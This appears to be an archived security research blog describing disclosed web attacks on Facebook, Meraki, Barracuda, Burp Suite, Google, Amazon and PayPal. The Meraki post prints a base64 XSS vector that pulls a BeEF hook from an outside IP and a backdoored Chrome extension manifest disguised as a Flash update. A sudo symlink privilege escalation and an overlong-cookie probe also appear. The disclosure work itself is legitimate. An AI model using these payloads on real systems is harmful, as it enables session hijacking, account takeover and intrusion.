March 19 2013

20:22

UI Redressing against Facebook

In this post, I'm going to discuss a possible attack scenario, targeting the Facebook web application, that could lead to the reset of account passwords in an automated fashion by exploiting a UI Redressing issue with the use of a cross-domain extraction technique.

UI Redressing bug, again

 

During my research, I discovered a Facebook web resource that is not protected by the X-Frame-Options header and that includes the fb_dtsg token, which is adopted as an anti-CSRF token (Figure 1). The following is the affected URL:
Figure 1 - Facebook's web resource vulnerable to UI Redressing attacks.
The iframe-to-iframe extraction method can be applied here to extract the fb_dtsg value and, consequently, perform a series of Cross-Site Request Forgery attacks against the integrity of the victim's profile data.


The theory behind the Facebook profiles takeover

 

Facebook allows users to add a mobile number that, once verified, can be used as a username to log in or to reset the account's password. Users can insert their mobile numbers via the Account Settings → Mobile → Add a phone → add your phone number options (Figure 2 and Figure 3): a confirmation code is then sent by Facebook's system to the user's mobile phone and must be entered (Figure 4) to complete the activation process.
Figure 2 - Users can add their mobile number via the "add your phone number here" link. Figure 3 - Facebook's form used to add a mobile number. Figure 4 - A confirmation code is sent to the user's mobile and must be entered to complete the process.
The main issue here is that no password is required to associate the mobile number with the user's profile. Because of this, an attacker may abuse the described UI Redressing vulnerability to steal the fb_dtsg token and register an arbitrary phone number. The attacker still needs to insert the confirmation code in order to associate his mobile number, though. A bit of black magic helps here: the attacker can abuse an SMS-to-mail mobile application to automatically forward the Facebook text message (SMS) to an attacker-controlled mailbox, thus allowing a hypothetical exploit to fetch the code and complete the insertion process.

The exploit

 

A working Proof of Concept exploit has been developed to demonstrate the described attack. We have also shared the code with the Facebook security team. During my experiments, the Android application SMS2Mail was adopted to forward the Facebook SMS (Figure 5) to the mailbox (Figure 6).

Figure 5 - SMS with the Facebook's confirmation code that has been forwarded to the attacker's mail box.
Figure 6 - Facebook confirmation code forwarded to the attacker's mailbox.
The following steps summarize the exploitation phases:
  1. The exploit frames the vulnerable resource and allows the victim to play a fake game while the cross-domain content extraction takes place;
  2. The fb_dtsg anti-CSRF token and the victim's user id are extracted. An HTTP request is then forwarded to the Facebook application to emulate the registration of the attacker-controlled mobile number;
  3. A text message (SMS) containing the confirmation code is sent to the attacker's mobile device. An SMS2Mail mobile application installed on the attacker's device automatically forwards the SMS to an attacker-controlled mailbox;
  4. The exploit waits for the SMS to be forwarded to the mailbox, then extracts the confirmation code and performs a second CSRF attack in order to submit the code itself and complete the mobile number registration.

The attacker's mobile number is now associated with the victim's profile and can be used to reset the account's password. As a matter of fact, Facebook allows users to enter a previously associated mobile number (Figure 7), which is then used to send a reset code (Figure 8).

Figure 7 - Reset password mechanism involving the user's mobile number. Figure 8 - Facebook's form used to insert the reset code.
A fully automated Proof of Concept exploit can be downloaded here, while the following video illustrates the described attack:

March 11 2013

07:28

Subverting a cloud-based infrastructure with XSS and BeEF

Well, the world is changing. You can probably do a lot more direct damage with a XSS in a high-value site than with a local privilege escalation in sudo [...] - lcamtuf@coredump.cx
If you are intrigued by sophisticated exploits and advanced techniques, Cross-Site Scripting probably isn't the most appealing topic for you. Nevertheless, recent events have demonstrated how this class of vulnerabilities has been used to compromise applications and even entire servers.

Today, we are going to present a possible attack scenario based on a real-life vulnerability that was recently patched by the Meraki team. Although the vulnerability itself isn't particularly interesting, it reveals how a trivial XSS flaw can be abused to subvert an entire network infrastructure.

Meraki

Meraki is the first cloud-managed network infrastructure company, and it's now part of Cisco Systems. The idea is pretty neat: all network devices and security appliances (wired and wireless) can be managed by a cutting-edge web interface hosted in the cloud, allowing Meraki networks to be completely set up and controlled through the Internet. Many enterprises, universities and numerous other businesses are already using this technology.

As usual, new technologies introduce opportunities and risks. In such environments, even a simple Cross-Site Scripting or a Cross-Site Request Forgery vulnerability can affect the overall security of the managed networks.

The vulnerability

During a product evaluation of a cloud-managed Wireless Access Point, we noticed the possibility of personalizing the captive portal splash page. Users accessing your WiFi network can be redirected to a custom webpage (e.g. containing a disclaimer) before accessing the Internet.

To further customize our splash page, we started including images and other HTML tags. To our big surprise, we quickly discovered that only basic HTML/JS validation was performed in that context. As a result, we were able to include things like:


What was even more interesting is the fact that the splash page is also hosted in the cloud. Unlike traditional WiFi APs, where the page is hosted on the device itself, Meraki appliances use cloud resources.

https://n20.meraki.com/splash/?mac=XXXX&client_ip=XXXX&client_mac=XXXX&vap=0&a=XXXX&b=XXXX&auth_version=5&key=ef1115d... AUTH_KEY...d41c283&node_ip=XXXX&acl_ver=XXXX&continue_url=http%3A%2F%2Fwww.google.com

To protect that page from random visitors, a unique token is used for authentication. As long as you provide the right token and the other required parameters, the page is accessible to Internet users.

Now, let's add to the mix that Meraki uses a limited number of domains for all customers (e.g. n1-29.meraki.com, etc.) and, more importantly, that the dashboard session token is scoped to *.meraki.com. This turns a stored XSS affecting our own device's domain into a vulnerability that can be abused to retrieve the dashboard cookies of other users and networks.

Attack scenario

An attacker with access to a Meraki dashboard can craft a malicious JS payload to steal the dashboard session cookie and obtain access to other users' devices. In practice, this allows an attacker to completely take over Meraki-managed wired and wireless networks.

BeEF, the well-known Browser Exploitation Framework, was used to simulate a realistic attack:

  1. The attacker customizes the splash page of his/her WiFi AP with an arbitrary JS payload, which includes the BeEF hook 
  2. By connecting a device (e.g. a testing device) to the physical wireless network controlled by the attacker, it is possible to retrieve the URL of the splash page, including the unique token
  3. Using social engineering, the attacker tricks the victim(s) into visiting the attacker-controlled splash page
  4. At this point, the victim browser is hooked in BeEF
  5. Using one of the available BeEF modules, the attacker can retrieve the HttpOnly dash_auth cookie and get access to the victim's Meraki dashboard 
  6. In the case of a Meraki WiFi Access Point, a convenient map will display the position of the device. In the config tab, it is also possible to disclose the network's password. At this stage, the actual network can be fully controlled by the attacker

  

A demonstration video of the attack is also available:



For the interested readers, a few technical details are also shared:
  • Cookie flags (e.g. HttpOnly) are the ASLR/DEP of browser security. It is possible to bypass those mitigation techniques, although it's getting more complex. Thanks to the progress of browser security and general awareness, stealing cookies marked as HttpOnly via a JS payload isn't trivial anymore. Cross-Site Tracing and similar techniques are obsolete, and browser plugins have also been patched. Besides exploiting specific server or browser bugs, attackers can only rely on social engineering tricks. During our Proof of Concept, a fake Flash update was used to install a malicious Chrome extension and get access to all cookies
  • Chrome extensions run with different privileges than normal JavaScript code executed by the renderer. A Chrome extension can override default SOP restrictions and issue cross-domain requests reading the HTTP response, access other browser tabs, and also read every cookie, including those marked as HttpOnly. The manifest of the deliberately backdoored Chrome extension is the following; the background.js file loads the BeEF hook.

    {
      "name": "Adobe Flash Player Security Update",
      "manifest_version": 2,
      "version": "11.5.502.149",
      "description": "Updates Adobe Flash Player with latest security updates",
      "background": {
        "scripts": ["background.js"]
      },
      "content_security_policy": "script-src 'self' 'unsafe-eval' https://174.136.111.122; object-src 'self'",
      "icons": {
        "16": "icon16.png",
        "48": "icon48.png",
        "128": "icon128.png"
      },
      "permissions": [
        "tabs",
        "http://*/*",
        "https://*/*",
        "cookies"
      ]
    }

    Not to blame Google, but just FYI: when the backdoored Chrome extension was uploaded to the Google Chrome Web Store, it was available straight after the upload. No checks were made by the application, for example to prevent the upload of an extension with very relaxed permissions, an unsafe-eval CSP directive, and Name/Description fields containing obviously fake content such as "Adobe Flash Update"
  • Choosing Google Chrome as the target browser required bypassing the XSS Auditor, its integrated anti-XSS filter. As discovered by Mario Heiderich, the data URI scheme with base64 content can be leveraged to bypass the filter. The following code snippet will trigger the classic alert(1), even on the latest Google Chrome at the time of writing (version 24.0.1312.71)


  • The final attack vector to inject the initial BeEF hook in Meraki's page is:

    <iframe src="data:text/html;base64,PHNjcmlwdD5zPWRvY3VtZW50LmNyZ
    WF0ZUVsZW1lbnQoJ3NjcmlwdCcpO3MudHlwZT0ndGV4dC9qYXZhc2Nya
    XB0JztzLnNyYz0naHR0cHM6Ly8xNzQuMTM2LjExMS4xMjIvaG9vay5qc
    yc7ZG9jdW1lbnQuZ2V0RWxlbWVudHNCeVRhZ05hbWUoJ2hlYWQnKVswX
    S5hcHBlbmRDaGlsZChzKTs8L3NjcmlwdD4=">


    And what is actually executed is:

    <script> s=document.createElement('script'); s.type='text/javascript'; s.src='https://174.136.111.122/hook.js'; document.getElementsByTagName('head')[0].appendChild(s); </script>

    Having a backdoored Chrome extension running in your browser opens up many new attack vectors which we didn't cover in the PoC. For example, it is possible to inject the BeEF hook into every open tab (you can imagine the impact of this :-), or to use the victim's browser as an open proxy using BeEF's Tunneling Proxy component, and many other attacks

This blog post is brought to you by @_ikki (NibbleSec) and @antisnatchor (BeEF core dev team).
Thanks to Meraki for the prompt response and the great service.

February 04 2013

06:56

Effective AMF Remoting Message fuzzing with Blazer v0.3


After several weeks of extensive testing and debugging, Blazer v0.3 is finally out!
It's been a long ride since the first lines of code, back in 2011. In this post, I am going to present all the new features and describe tips & tricks to make your AMF security testing even more effective.

If you are not familiar with Blazer, have a look at the project page: http://code.google.com/p/blazer/.
New to Burp Suite? Have a look at the video tutorials and consider buying Instant Burp Suite Starter.

What's new?

Blazer v0.3 includes a few interesting new features presented during my DeepSec talk, but even more important is the result of extensive testing on Windows, Mac OS X and Linux using multiple Java Runtime Environments and recent Burp Suite releases.

  • Java classes and source code import feature
    In addition to JARs, it is now possible to import directories containing .class and .java files. The ability to import source code, in addition to application libraries, makes it possible to partially use Blazer even during black-box security testing.
  • AMF request/response export functionality (AMF2XML)
    Sharing details of security vulnerabilities triggered by AMF messages used to be annoying, as it was not possible to export AMF requests and responses in an intelligible format. Using the AMF2XML feature, it is now possible to export those messages to a file or to the console.


  • Sandbox feature using a custom security manager 
    The rationale behind the introduction of this feature is to prevent any malicious action caused by application libraries. Blazer uses Java reflection and fairly complex heuristics to automatically instantiate and populate objects using the application libraries. Application objects are created on the tester's computer and methods are locally invoked to populate attributes before sending the AMF message to the remote service. As a result, untrusted application libraries may end up writing files, opening network sockets or performing other involuntary IO operations.


  • Numerous bugs and performance issues fixed
    I've fixed more than 20 bugs and multiple performance issues, including an annoying GUI refresh bug on OS X and Windows. This version has been extensively tested on multiple platforms; I've specifically delayed the release to make sure that all issues I encountered during my testing have been fixed.


BlackBox vs GrayBox testing with Blazer

Blazer is a security tool for gray-box testing. It has been designed and built under the assumption that the application libraries are available to the tester, so that all Java classes exchanged between client and server can be imported into the tool. This is a realistic assumption if you are doing vulnerability research, less so if you are performing a standard pentest.

However, starting from this release, it is possible to partially use Blazer during black-box testing. If the application uses primitive types and libraries that can be downloaded from the Internet, you can benefit from Blazer's automatic object generation by manually crafting a fake .java file including all method signatures:

1. Decompile the client-side Flex components (e.g. SWF files) or monitor the network traffic in order to enumerate all remote methods. The Deblaze tool can be used for this.

2. Create a .java file containing the method signatures as observed in the traffic, using stub bodies. Something like the following:

package flex.samples.product;

public class ProductService {
    public Product getProduct(int prodId) {
        return null; // stub body - only the signature matters here
    }
}
3. In Blazer, import the crafted Java source file and all application libraries referenced by the application. At this stage, Blazer can be used to automatically generate objects and perform fuzzing.

Tips & Tricks 

Fuzzing complex applications containing multiple custom classes isn't trivial. To improve coverage and effectiveness, the following recommendations can save you precious time:

  • Always increase the amount of memory that your computer makes available to Burp Suite. If you are generating a large number of AMF messages, consider chaining two instances of Burp Suite: the first instance can be used to intercept the application requests and launch Blazer; in Blazer, set the proxy within tab 3 to point to the second Burp Suite instance, which will collect all requests generated by Blazer. In Burp Suite Pro, you can also enable automatic backups to prevent any data loss.

  • As of Burp Suite v1.5.01, Burp Extender has a new API. Blazer has been improved to support both the old and the new Burp Extender APIs. Standard output and error can be displayed within Burp Extender, written to a file or shown in the console. During testing, I suggest redirecting those streams to two separate files in order to record all operations and exceptions (a minimal extension skeleton sketching this follows the list).

  • Balancing the number of permutations, attack vectors and probability is Blazer's magic sauce. Read the original whitepaper/presentation, make sure you understand those settings and tune the tool accordingly. Even better, check the implementation of the ObjectGenerator class.

  • Divide et impera by breaking up numerous application method signatures into small groups. Start by testing a few methods and make sure that you have imported all required application libraries. Finally, review the server responses and monitor the server's status to detect security vulnerabilities. For example - if you are looking for SQL injection - use Burp's filter-by-search-term to identify AMF messages that triggered visible errors, and grep for similar strings in the server logs. Blazer appends a custom HTTP header to all AMF requests that can be used to correlate a message with its method signature. Also, the new export functionality can be used to review the AMF payload.

  • Feel free to email me if you have any questions. Also, let me know if you find bugs while using Blazer!
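
As for the stream-redirection tip above, the following is a minimal extension skeleton sketching the idea. It assumes the post-1.5.01 burp.IBurpExtender interface; the log file names are illustrative.

package burp;

import java.io.FileOutputStream;
import java.io.PrintStream;

public class BurpExtender implements IBurpExtender {
    @Override
    public void registerExtenderCallbacks(IBurpExtenderCallbacks callbacks) {
        callbacks.setExtensionName("Stream redirection sketch");
        try {
            // record operations and exceptions in two separate files
            System.setOut(new PrintStream(new FileOutputStream("extension-stdout.log"), true));
            System.setErr(new PrintStream(new FileOutputStream("extension-stderr.log"), true));
        } catch (Exception e) {
            callbacks.issueAlert("Could not redirect streams: " + e.getMessage());
        }
    }
}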

    January 25 2013

    10:13

    How to patch your Barracuda virtual appliance

    Today's "news" is about backdoors found in multiple Barracuda appliances. Basically, Barracuda appliances have multiple hardcoded system accounts and firewall rules specifically designed to allow remote assistance. If you want more gossip, you can read about it on KrebsOnSecurity, The Register or The H Online.

    A new old story

    According to the original advisory, the bug was discovered on 2012-11-20 by Stefan Viehböck. Although Stefan has done pretty interesting research in the past (e.g. the WiFi WPS design bug), the Barracuda backdoor is really not a new story. Not only was this issue known, it had even been disclosed and discussed several times.
    Although it's natural to be surprised that such a critical issue has been underestimated for nine years, we should rather use this opportunity to stop these bad practices. Unfortunately, it's not just Barracuda - many vendors have adopted similarly poorly-designed solutions for remote assistance. As customers, we should always evaluate products and demand more accountability and transparency.

    Digital self-defense

    In 2011, while helping a friend set up his network, I came across the advisory from 2004 and started investigating. After having confirmed the issue, I decided to patch the virtual appliance on my own. If you think that the mitigation provided by Barracuda in security definition 2.0.5 is not adequate for your environment, keep reading. Hopefully, Barracuda will reconsider the situation and you won't need to manually patch your device.

    Disclaimer: Use this information at your own risk! 
    You may end up with a broken appliance and no vendor warranty. Also, I am not a lawyer and I haven't reviewed the product EULA. Finally, note that this method has been tested against the Barracuda WebApp Firewall 660vxl (v7.5.0.x) virtual appliance only.

    Patching your virtual appliance

    Removing system accounts and changing the iptables configuration require privileged shell access. As the original techniques for rooting the device are now deprecated (at least on the device I had), I started looking for other ways to get a root shell. Soon, I realized that it is possible to abuse the recovery partition in order to include arbitrary resources. This technique requires "physical" access to the appliance and multiple reboots, which is why I consider it preferable to disclosing the root password, and why I suggest abusing the backdoor itself in order to patch the device.

    Rooting the Barracuda WebApp Firewall is a multi-step process:

    1) Boot the Barracuda virtual appliance with a standard Linux distribution (e.g. booting from a virtual CD) and mount the recovery partition (/dev/sda9) in order to copy the patcher script (rootme.sh).

    rootme.sh can be downloaded here

      $ mkdir /mnt/temp
      $ mount /dev/sda9 /mnt/temp
      $ cp rootme.sh /mnt/temp/
      $ chmod 777 /mnt/temp/rootme.sh
      $ /mnt/temp/rootme.sh
      $ umount /mnt/temp
      $ reboot


    2) From the web console, revert the firmware to the factory-installed version (Advanced-->Firmware Update-->Firmware Revert) and reboot the appliance again. If the Firmware Revert button is not available (it's grayed out and cannot be selected), you need to update the device to the newest firmware and repeat the entire process.

    3) Visit https://barracuda_ip/cgi-mod/rootme.cgi. After that, you can connect to the device via SSH using a temporary root password. Removing the hardcoded system accounts and changing iptables is left as an exercise.


    A few more technical details:

    • rootme.sh is simply used to copy rootme.cgi to the web console webroot in order to facilitate the rooting process
    • rootme.cgi is used to escalate privileges from the Apache user (nobody) to root, change the root password and modify the firewall rules in order to allow external access
    • Privilege escalation is possible due to an insecure sudoers configuration. Again, nothing fancy. Please note that I reported this misconfiguration to Barracuda on 09/12/2011.
       # abuse the insecure sudoers configuration: replace ping with a symlink to bash
       $ sudo mv /bin/ping /tmp/ping.old
       $ sudo ln -s /bin/bash /bin/ping
       # "ping -c whoami" now runs "bash -c whoami", executed as root
       $ sudo ping -c whoami


      January 14 2013

      06:15

      Anti-debugging techniques and Burp Suite

      Incipit

      No matter how good a Java obfuscator is, the bytecode can still be analyzed and partially decompiled. Also, using a debugger, it is possible to dynamically observe the application's behavior at runtime, making reverse engineering much easier. For this reason, developers often use routines to programmatically detect execution under a debugger in order to prevent easy access to the application's internals. Unfortunately, these techniques can also be extremely annoying for people with good intents.

       

      Burp Suite

      Over the course of the years, starting from the very first release, I have been an enthusiastic supporter of Burp Suite. Not only was @PortSwigger able to create an amazing tool, he also built a strong community that welcomes each release as a big event. He has also been friendly and open to feedback, ready to implement suggested features. Hopefully, he won't change his attitude now.

      As of a few releases ago, neither Burp Suite Free nor Pro can be executed under a debugger. Unfortunately, this is a severe limitation - especially considering the latest Extensibility API. The new extensibility framework is a game-changer: it is now possible to fully integrate custom extensions into our favorite tool. But how do you properly debug extensions in an IDE? Troubleshooting fairly complex extensions (e.g. Blazer) requires a lot of debugging; setting breakpoints, stepping in and out of methods, and so on are must-have operations.

      Inspired by necessity, I spent a few hours reviewing the anti-debugging mechanism used in Burp Suite Free. According to Burp's EULA (Free Edition), reversing does not seem to be illegal as long as it is "essential for the purpose of achieving inter-operability". So as not to facilitate any illegal activity, this post will discuss details related to the Free edition only.
      Disclaimer: Don't be a fool, be cool. If you use Burp Pro, you must have a valid license.

       

      Automatic detection of a debugger

      In Java, it is possible to enable remote debugging with the following options:

      -Xdebug -agentlib:jdwp=transport=dt_socket,server=y,address=8000,suspend=n 

      and attach a debugger with:

       jdb -attach [host]:8000

      A common technique to programmatically determine whether a program is running under a debugger involves checking the input arguments passed to the Java Virtual Machine. The following is the (cleaned-up) pseudo-code of a very common check:

       for (String arg : ManagementFactory.getRuntimeMXBean().getInputArguments()) {
           if (arg.contains("-Xdebug") || arg.contains("-agentlib")) {
               // Do something annoying for the user
           }
       }

      In practice, ManagementFactory returns the managed bean for the runtime system of the current Java Virtual Machine, which can be used to retrieve the execution arguments (see the RuntimeMXBean API for further details). In the case of Burp Free, the application gets shut down via a System.exit(0);

       

      Bypass techniques, an incomplete list

      First of all, it is always possible to attach the debugger once the Java process is already up and running: any check performed during application startup won't block the execution.

      jdb -connect sun.jvm.hotspot.jdi.SAPIDAttachingConnector:pid=[Process ID]

      Unfortunately, this is a read-only mechanism and cannot be used within traditional IDEs. Better solutions require tweaking the application in order to modify the program execution. This can be achieved via static changes in the .class files or via static/dynamic bytecode instrumentation. The check above is pretty simple and can be bypassed in several ways:
      • Using ClassEditor, reJ or any other tool that allows .class manipulation, it is just necessary to identify all strings in the constant pool used during the string comparison within the if-statement. For instance, you could replace all those strings with a bunch of "a"s so that the program won't even enter the if-statement body
      Manually changing the Constant Pool of a .class file


      •  An even more portable solution, especially when string obfuscation is used, consists of editing the bytecode with Javassist or similar libraries. This makes it possible to write a piece of code that searches for a class and patches it:
        • For instance, we could force getInputArguments() to return an empty List;
        • Or, we could insert an arbitrary unconditional jump (jsr) to skip the program shutdown;
        • Or again, we could override the System.exit() method with a local method that has an empty body: first, we create a fake static exit(int) method, then we replace System.exit() with the custom method within our class.
      Using Javassist to replace an existing method within a class
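
      Since the original screenshot is gone, the following is a minimal Javassist sketch of that last family of tricks (the target class name and output directory are illustrative): it rewrites every System.exit() call site inside a class into a no-op, so the anti-debugging check can no longer kill the JVM.

      import javassist.ClassPool;
      import javassist.CtClass;
      import javassist.expr.ExprEditor;
      import javassist.expr.MethodCall;

      public class ExitPatcher {
          public static void main(String[] args) throws Exception {
              ClassPool pool = ClassPool.getDefault();
              CtClass target = pool.get("com.example.CheckedClass"); // hypothetical class name

              // replace every System.exit(...) call site with an empty statement
              target.instrument(new ExprEditor() {
                  @Override
                  public void edit(MethodCall m) throws javassist.CannotCompileException {
                      if ("java.lang.System".equals(m.getClassName())
                              && "exit".equals(m.getMethodName())) {
                          m.replace("{ }");
                      }
                  }
              });

              // write the patched class to ./patched/com/example/CheckedClass.class
              target.writeFile("patched");
          }
      }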

      Patching Burp Free for debugging your custom extensions

      With the honest intent of simplifying the life of coders writing custom Burp extensions, I have developed a small utility (BurpPatchMe) to patch your own copy of Burp Free - which will allow you to debug your code in NetBeans, Eclipse, etc.
      BurpPatchMe
        A few important details:
        • BurpPatchMe works for Burp Suite Free only. I have included a specific check for it, and the technique used is compatible with that release only. Again, you won't be able to remove the debugger detection in Burp Suite Pro using this tool. Go and buy your own copy of this amazing tool!
        • BurpPatchMe is compiled without debugging info and has been obfuscated too - a quick skiddie-prevention mechanism to avoid abuse
        • BurpPatchMe does not contain any of Burp's code, libraries or resources. It is your own responsibility to accept the EULA agreement and its conditions before downloading Burp Free. Also, this tool is provided as-is - please do not send emails/comments asking for "features"
        • The Java JDK is required in order to use this tool. All other dependencies are included within the jar
      You can download BurpPatchMe here and launch it with:
      $ java -jar BurpPatchMe.jar -file burpsuite_free_v1.5.jar   
       Long live Burp Suite and happy extensions!

      December 31 2012

      21:06

      UI Redressing Mayhem: Identification Attacks and UI Redressing on Google Chrome

      Today I'm going to disclose a series of UI Redressing issues that could be exploited to extract information that may help an attacker identify a victim whenever anonymity is a critical requirement. Moreover, a new extraction method, successfully applied against Google Chrome, will be presented. Google's web browser disallows cross-origin drag&drop, and what I'm introducing here is a completely different approach to achieving the extraction of potentially sensitive data.

      Identification Attacks


      I found that several world-renowned web applications fail to protect their web resources from UI Redressing attacks, thus revealing data that can be abused to disclose a user's identity. An identification attack can be performed by exploiting a UI Redressing flaw affecting web resources that include, for example, the name or the e-mail address of the victim.

      A series of vulnerabilities are presented below in order to exemplify some of these attacks. The first issue affects a Google web application: an authenticated Google user can be attacked by abusing a UI Redressing vulnerability on the support.google.com domain. As shown in Figure 1, no X-Frame-Options header is adopted, thus allowing the cross-domain extraction of personal data such as:
      • Victim's e-mail address;
      • Victim's first and last name;
      • Victim's profile picture URL.
      Figure 1 - Google Support vulnerable to UI redressing attacks.
      A Proof of Concept exploit can be downloaded here. The following is a video demonstrating the attack:



      Similar vulnerabilities have been found in other popular web applications. The following is a list of identified vulnerable web resources exposing users' data:

      Microsoft Profile (First name, last name, e-mail address, etc - Figure 2)
      Figure 2 - Microsoft Profile web resource vulnerable to UI Redressing attacks.
      Yahoo! (e-mail address, first name, birth date, sex, etc - Figure 3):
      Figure 3 - Yahoo! web resource vulnerable to UI Redressing attacks.

       

      Beyond the iframe-to-iframe extraction method


      The Google Chrome web browser seemed to have defeated all extraction methods, denying the use of the view-source handler and disallowing cross-origin drag&drop. Despite these adverse conditions, I identified some attack scenarios where a UI Redressing issue can still be exploited to extract sensitive data. Once again, the method is extremely simple. Instead of a cross-origin drag&drop, the victim is tricked into performing a same-origin action, where the dragged content belongs to a vulnerable web page of the targeted application and the "dropper" is a form (text area, input text field, etc.) located on the same domain. Using a site functionality that allows publishing externally-facing content, it is still possible to extract information. Under these circumstances, Chrome will not (reasonably) deny the same-origin drag&drop, thus inducing the victim to involuntarily publish sensitive data. As a matter of fact, the attacker is exploiting a subsequent clickjacking vulnerability on the same domain, which causes the publication of the personal information. I refer to this kind of attack chain as a "bridge" that allows the attacker to move sensitive data from private to public while remaining on the same domain. The attacker can then simply access the (now) public information to obtain the extracted data. It should be noted that the technique requires two vulnerabilities: a web resource that is not protected by X-Frame-Options (or uses weak frame-busting code) and a site functionality that is affected by clickjacking.

      The following list summarizes a series of functionalities that could be abused to extract the sensitive data:
      • Forum's post mechanism;
      • "comment this item" functionalities;
      • Public profile information updating function (or any "update function" that involves public available data - e.g. administrative functions that cause the updating of the web site's content);
      • Messaging functionalities (e.g. from the victim to the attacker);
      The proposed method has been successfully applied against Google Chrome version 23.0.1271.97, targeting the Amazon web application. Amazon exposes a series of web resources that include user data - such as the name, e-mail address, mobile number and "address book" details - and that are protected by neither the X-Frame-Options header nor any frame-busting mechanism. As an example, the following vulnerable URL includes the Amazon user's first name, last name and e-mail address:
      A second issue, in the comment function - our "bridge" - can be abused to publish the user's information as a comment on an attacker-chosen Amazon item (e.g. a book) whose comments are "monitored". The following steps summarize the exploitation phases:
      1. The exploit frames both the vulnerable URL and the comment form of an attacker-chosen Amazon book;
      2. The victim is tricked into dragging his data and dropping the information into the framed comment form;
      3. A clickjacking attack is then performed against the "Post" mechanism, in order to publish the dropped data;
      4. At that point, the attacker can access all personal details by simply viewing the submitted comment on the Amazon item.
      The exploit code can be downloaded here, while the following is a video of the described attack:

      December 19 2012

      11:15

      UI Redressing Mayhem: HttpOnly bypass PayPwn style

      In the previous post, a new cross-domain extraction method - affecting the latest version of the Mozilla Firefox browser - was presented. The iframe-to-iframe technique was successfully used in a UI Redressing attack affecting LinkedIn. Today, I'm introducing an application of the aforementioned method that involves a known Apache Web Server security issue in order to steal session cookies protected by the HttpOnly flag, thus allowing the attacker to perform Session Hijacking attacks. A new attack targeting PayPal systems will also be presented.

      CVE-2012-0053: HttpOnly bypass and beyond


      In January 2012 - even though the Apache defect had been known and exploited for a while - Norman Hippert disclosed CVE-2012-0053, a bug affecting the Apache Web Server. The software failed to correctly restrict header-field information disclosure in the case of overlong or malformed HTTP requests. The vulnerability can be combined with a Cross-Site Scripting attack to bypass the protection mechanism introduced by the HttpOnly flag and steal any session token stored as a cookie value. In fact, an XSS vector can manipulate the document.cookie object to set an overlong cookie field and forward a malformed request to the affected Apache Web Server, with the intention of triggering the error message and extracting the desired session cookies. The Apache bug can be abused in a series of attack scenarios, such as the following:
      • Bypassing the HttpOnly flag with an XSS vulnerability on the same domain that is affected by CVE-2012-0053;
      • Bypassing the limitation introduced by the cookie path, where the XSS vulnerability affects a web resource that resides outside the defined path itself;
      • Bypassing the HttpOnly flag if an XSS vulnerability is found on any subdomain of the host that is affected by the Apache disclosure issue, when exploited in conjunction with a UI Redressing attack that allows the cross-domain extraction of the information included in the triggered Apache error message.
        It should also be noted that the Apache Web Server is often deployed in a reverse proxy configuration. As a result, session objects from any server-side technology can be attacked with the described vectors.
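
        To make the precondition concrete, the following is a minimal sketch of how one could check whether a server reflects an overlong Cookie header in its error page (the CVE-2012-0053 behaviour). The target URL is a placeholder - only probe hosts you are authorized to test.

        import java.io.BufferedReader;
        import java.io.InputStream;
        import java.io.InputStreamReader;
        import java.net.HttpURLConnection;
        import java.net.URL;

        public class CookieLeakCheck {
            public static void main(String[] args) throws Exception {
                URL url = new URL("https://target.example/"); // placeholder
                HttpURLConnection conn = (HttpURLConnection) url.openConnection();

                // build a cookie larger than Apache's default 8190-byte header limit
                StringBuilder cookie = new StringBuilder("z=");
                for (int i = 0; i < 9000; i++) cookie.append('A');
                conn.setRequestProperty("Cookie", cookie.toString());

                System.out.println("HTTP status: " + conn.getResponseCode()); // 400 expected
                InputStream err = conn.getErrorStream();
                if (err == null) return;
                try (BufferedReader in = new BufferedReader(new InputStreamReader(err))) {
                    String line;
                    while ((line = in.readLine()) != null) {
                        // a vulnerable server echoes the oversized Cookie header back
                        if (line.contains("AAAAAAAA")) {
                            System.out.println("Cookie reflected in error page: likely vulnerable");
                            return;
                        }
                    }
                }
            }
        }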

        Smashing PayPal for Fun but.. NO Profit

         

        During my security research on UI Redressing attacks, I found multiple PayPal subdomains (e.g. https://b.stats.paypal.com) affected by the Apache disclosure bug, as detailed in Figure 1 and Figure 2.

        Figure 1 - HTTP request with the overlong cookie.
        Figure 2 - Apache error message with the disclosure of the malformed Cookie header.
        Although at first glance the bug could appear useless, I found that the PayPal application - www.paypal.com - delivers its session cookies with the domain attribute set to .paypal.com (Figure 3 and Figure 4).

        Figure 3 - Post-authentication cookies delivery.
        Figure 4 - Cookies delivered to the personal.paypal.com subdomain.

        The highlighted security issues can be abused to attack authenticated PayPal users, combining the mentioned UI Redressing attacks with the cookie disclosure bug. But.. I had a problem: I had no XSS vulnerability on any PayPal web application - not that there aren't any! I was able to work around this limitation by identifying another vulnerability on a different PayPal subdomain that allowed me to define a monster cookie with a single HTTP request. First, please note the following URL:
        As detailed in Figure 5, navigating the above URL sets a cookie named navcmd, and then a bit of client-side black magic defines two new cookie fields named s_sess and s_pers (Figure 6) that complete the desired malformed HTTP request.

        Figure 5 - Cookie defined with attacker-controlled input.
        Figure 6 - Final monster cookie.

        7350PayPwn

         

        The exploitation is now trivial. The following are the logical steps implemented by the Proof of Concept exploit:
        1. The exploit triggers the victim to open a pop-under page (Figure 7) that generates the monster cookie - with domain=.paypal.com - involving the history.paypal.com application;
        2. The https://b.stats.paypal.com application is then framed, thus inducing the forwarding of a malformed HTTP request that triggers the disclosure of the Cookie header, containing the PayPal account's session cookies;
        3. The malicious page allows the victim to play the d&d game with the extraction of the secret session cookies.

        Figure 7 - Pop-under page with the navigation of the monster cookie's generation URL.

        The attacker now holds the cookies, which can be used to perform a Session Hijacking attack against the victim's PayPal account. A working Proof of Concept has been developed and can be downloaded here. The following is a video that illustrates the described attack:

        December 18 2012

        23:31

        UI Redressing Mayhem: Firefox 0day and the LeakedIn affair

        In the past weeks I have been working on UI Redressing exploitation methods. The UI Redressing Mayhem series illustrates the results of my research, presenting 0day exploitation techniques and several vulnerabilities involving high-profile web applications. Each post in the series will also provide detailed information about the vulnerabilities and techniques, together with working Proof-of-Concept exploits.

        The following article details a previously unknown Mozilla Firefox vulnerability that affects the latest version (v17.0.1) of the Mozilla web browser and allows malicious users to perform cross-domain extraction of sensitive data via UI Redressing vectors.

        It was a dark and stormy night...


        My security research on UI Redressing exploitation techniques has its roots in a web application penetration test where I was asked to exploit a UI Redressing bug with the explicit constraint of targeting Mozilla Firefox users. My objective was to achieve cross-domain content extraction of an anti-CSRF token in order to trigger the update of the victim's profile e-mail address: the powerful double drag&drop method was found to be appropriate in that context. To the best of my knowledge, the method was first introduced by Ahamed Nafeez and is based on the possibility of performing a drag&drop action between a framed web page, which displays the "sensitive" contents and is not protected by the X-Frame-Options header, and the framing page (the "dropper" page), which receives and stores the extracted content. The view-source handler is used here to bypass any frame-busting code.

